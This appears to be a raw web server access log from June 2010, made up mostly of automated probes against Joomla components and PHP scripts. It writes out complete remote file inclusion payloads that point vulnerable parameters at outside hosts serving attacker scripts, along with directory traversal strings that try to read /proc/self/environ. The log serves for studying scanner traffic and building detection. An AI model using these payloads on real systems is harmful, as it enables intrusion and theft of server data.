62.122.96.6 - - [27/Jun/2010:03:49:58 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 200 11106 "-""Casper Bot Search"
62.122.96.6 - - [27/Jun/2010:03:49:58 -0500] "GET /logs/access_log.1275609600/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
75.136.121.230 - - [27/Jun/2010:03:50:42 -0500] "GET /logs/access_log.1274572800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
75.136.121.230 - - [27/Jun/2010:03:50:43 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
75.136.121.230 - - [27/Jun/2010:03:50:44 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
62.122.96.6 - - [27/Jun/2010:03:50:46 -0500] "GET /logs/access_log.1276732800/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
184.73.32.42 - - [27/Jun/2010:03:51:11 -0500] "GET /logs/access_log.1273190400 HTTP/1.1" 200 32768 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
75.136.121.230 - - [27/Jun/2010:03:51:32 -0500] "GET /logs/access_log.1266710400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:51:43 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:51:43 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
66.197.135.72 - - [27/Jun/2010:03:51:43 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
78.41.233.128 - - [27/Jun/2010:03:51:46 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
174.121.166.146 - - [27/Jun/2010:03:51:48 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.59.156.163 - - [27/Jun/2010:03:51:49 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:51:54 -0500] "GET /?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:51:58 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:51:58 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:03:52:03 -0500] "GET /?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
212.241.251.207 - - [27/Jun/2010:03:52:05 -0500] "GET /logs/access_log.1274054400/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
67.59.156.163 - - [27/Jun/2010:03:52:06 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:52:08 -0500] "GET /?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
212.25.25.105 - - [27/Jun/2010:03:53:09 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
212.25.25.105 - - [27/Jun/2010:03:53:09 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
78.41.233.128 - - [27/Jun/2010:03:55:20 -0500] "GET /logs/access_log.1274572800/?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:03:55:21 -0500] "GET /?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:03:55:21 -0500] "GET /logs/?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:55:23 -0500] "GET /logs/access_log.1274572800/?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:55:23 -0500] "GET /?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:55:24 -0500] "GET /logs/?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:55:31 -0500] "GET /logs/access_log.1274572800/?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:55:31 -0500] "GET /?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:55:31 -0500] "GET /logs/?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.805"
62.122.96.6 - - [27/Jun/2010:03:55:55 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
62.122.96.6 - - [27/Jun/2010:03:55:56 -0500] "GET /logs/access_log.1276732800/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
62.122.96.6 - - [27/Jun/2010:03:55:56 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 200 11106 "-""Casper Bot Search"
78.41.233.128 - - [27/Jun/2010:03:55:56 -0500] "GET /logs/access_log.1276732800/?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
62.122.96.6 - - [27/Jun/2010:03:55:56 -0500] "GET /logs/access_log.1276214400/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
94.247.176.194 - - [27/Jun/2010:03:55:58 -0500] "GET /logs/access_log.1276732800/?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:56:05 -0500] "GET /logs/access_log.1276732800/?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:03:57:29 -0500] "GET /logs/access_log.1274572800/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:03:57:29 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:03:57:29 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.805"
195.225.170.108 - - [27/Jun/2010:03:57:50 -0500] "GET /logs/access_log.1274832000/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
195.225.170.108 - - [27/Jun/2010:03:57:51 -0500] "GET /*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
195.225.170.108 - - [27/Jun/2010:03:57:51 -0500] "GET /logs/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:58:02 -0500] "GET /logs/access_log.1274572800/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:58:03 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:58:03 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:58:08 -0500] "GET /logs/access_log.1274572800/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:58:08 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:58:09 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.805"
122.201.73.37 - - [27/Jun/2010:03:59:27 -0500] "GET /logs/access_log.1266710400///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/.%20%20/.bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.833"
122.201.73.37 - - [27/Jun/2010:03:59:27 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/.%20%20/.bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.833"
122.201.73.37 - - [27/Jun/2010:03:59:28 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/.%20%20/.bash/id1.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.833"
75.136.121.230 - - [27/Jun/2010:03:59:57 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
75.136.121.230 - - [27/Jun/2010:03:59:57 -0500] "GET /logs/access_log.1266710400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
75.136.121.230 - - [27/Jun/2010:03:59:57 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:04:00:25 -0500] "GET /logs/access_log.1275782400/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
122.201.73.37 - - [27/Jun/2010:04:01:23 -0500] "GET /logs/access_log.1274832000///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/.%20%20/.bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.833"
94.247.176.194 - - [27/Jun/2010:04:01:30 -0500] "GET /logs/access_log.1275782400/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:04:01:31 -0500] "GET /logs/access_log.1275782400/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
62.122.96.6 - - [27/Jun/2010:04:01:45 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
62.122.96.6 - - [27/Jun/2010:04:01:46 -0500] "GET /logs/access_log.1275868800/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
62.122.96.6 - - [27/Jun/2010:04:01:46 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 200 11106 "-""Casper Bot Search"
62.122.96.6 - - [27/Jun/2010:04:01:47 -0500] "GET /logs/access_log.1275609600/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
62.122.96.6 - - [27/Jun/2010:04:04:51 -0500] "GET /logs/access_log.1275868800%20%20/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Casper Bot Search"
62.122.96.6 - - [27/Jun/2010:04:04:51 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
62.122.96.6 - - [27/Jun/2010:04:04:51 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 200 11106 "-""Casper Bot Search"
62.122.96.6 - - [27/Jun/2010:04:04:52 -0500] "GET /logs/access_log.1275609600%20%20/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Casper Bot Search"
85.19.150.100 - - [27/Jun/2010:04:05:18 -0500] "GET /logs/access_log.1274832000/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.808"
85.19.150.100 - - [27/Jun/2010:04:05:18 -0500] "GET /*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
85.19.150.100 - - [27/Jun/2010:04:05:19 -0500] "GET /logs/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
85.19.150.100 - - [27/Jun/2010:04:05:22 -0500] "GET /logs/access_log.1274832000/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.808"
85.19.150.100 - - [27/Jun/2010:04:05:22 -0500] "GET /*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
85.19.150.100 - - [27/Jun/2010:04:05:23 -0500] "GET /logs/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
174.121.166.146 - - [27/Jun/2010:04:06:38 -0500] "GET /logs/access_log.1276473600//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.166.146 - - [27/Jun/2010:04:06:38 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.166.146 - - [27/Jun/2010:04:06:38 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
208.180.27.50 - - [27/Jun/2010:04:08:03 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.195.112.180 - - [27/Jun/2010:04:08:45 -0500] "GET /logs/access_log.1200268800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.182.63.49 - - [27/Jun/2010:04:11:13 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
85.19.150.100 - - [27/Jun/2010:04:11:14 -0500] "GET /logs/access_log.1275004800/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.808"
85.19.150.100 - - [27/Jun/2010:04:11:14 -0500] "GET /logs/access_log.1275004800/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.808"
216.180.240.110 - - [27/Jun/2010:04:14:24 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:14:44 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:14:49 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:14:59 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
89.111.176.149 - - [27/Jun/2010:04:15:04 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.121.87.31 - - [27/Jun/2010:04:15:06 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.87.31 - - [27/Jun/2010:04:15:10 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.87.31 - - [27/Jun/2010:04:15:10 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.87.31 - - [27/Jun/2010:04:15:11 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.87.31 - - [27/Jun/2010:04:15:22 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.25.25.105 - - [27/Jun/2010:04:15:30 -0500] "GET /logs/access_log.1276128000//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
212.25.25.105 - - [27/Jun/2010:04:15:30 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
212.25.25.105 - - [27/Jun/2010:04:15:31 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
212.25.25.105 - - [27/Jun/2010:04:15:31 -0500] "GET /logs/access_log.1276128000//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
212.25.25.105 - - [27/Jun/2010:04:15:32 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
212.25.25.105 - - [27/Jun/2010:04:15:32 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
212.25.25.105 - - [27/Jun/2010:04:15:35 -0500] "GET /logs/access_log.1276732800//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
212.25.25.105 - - [27/Jun/2010:04:15:36 -0500] "GET /logs/access_log.1276732800//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
89.111.176.149 - - [27/Jun/2010:04:15:50 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.197.135.72 - - [27/Jun/2010:04:16:40 -0500] "GET /logs/access_log.1276128000//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.820"
66.197.135.72 - - [27/Jun/2010:04:16:40 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
66.197.135.72 - - [27/Jun/2010:04:16:40 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.820"
66.197.135.72 - - [27/Jun/2010:04:16:46 -0500] "GET /logs/access_log.1276732800//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.820"
219.117.255.170 - - [27/Jun/2010:04:17:05 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:04:17:25 -0500] "GET /logs/access_log.1276732800//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:04:17:25 -0500] "GET /logs/access_log.1276732800//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:04:17:25 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:04:17:25 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:04:17:26 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:04:17:26 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:04:17:26 -0500] "GET /logs/access_log.1276732800//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:04:17:26 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:04:17:26 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.205.173.243 - - [27/Jun/2010:04:17:27 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
91.205.173.243 - - [27/Jun/2010:04:17:27 -0500] "GET /artwork/index.htm HTTP/1.1" 200 11078 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
91.205.173.243 - - [27/Jun/2010:04:17:30 -0500] "GET /logs/access_log.1265673600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
91.205.173.243 - - [27/Jun/2010:04:17:34 -0500] "GET /logs/access_log.1270944000 HTTP/1.1" 200 229376 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
67.59.156.163 - - [27/Jun/2010:04:17:35 -0500] "GET /logs/access_log.1276732800//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:04:17:35 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:04:17:35 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.205.173.243 - - [27/Jun/2010:04:17:38 -0500] "GET /logs/access_log.1271808000 HTTP/1.1" 200 229376 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
91.205.173.243 - - [27/Jun/2010:04:17:44 -0500] "GET /logs/access_log.1271894400 HTTP/1.1" 200 229376 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
219.117.255.170 - - [27/Jun/2010:04:17:46 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:04:18:01 -0500] "GET /logs/access_log.1276041600//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:04:18:02 -0500] "GET /logs/access_log.1276041600//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:04:18:06 -0500] "GET /logs/access_log.1276041600//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
189.108.172.26 - - [27/Jun/2010:04:18:12 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:04:18:12 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:04:18:16 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
208.180.27.50 - - [27/Jun/2010:04:18:25 -0500] "GET /logs/access_log.1276041600/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
67.59.156.163 - - [27/Jun/2010:04:18:25 -0500] "GET /logs/access_log.1276041600//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
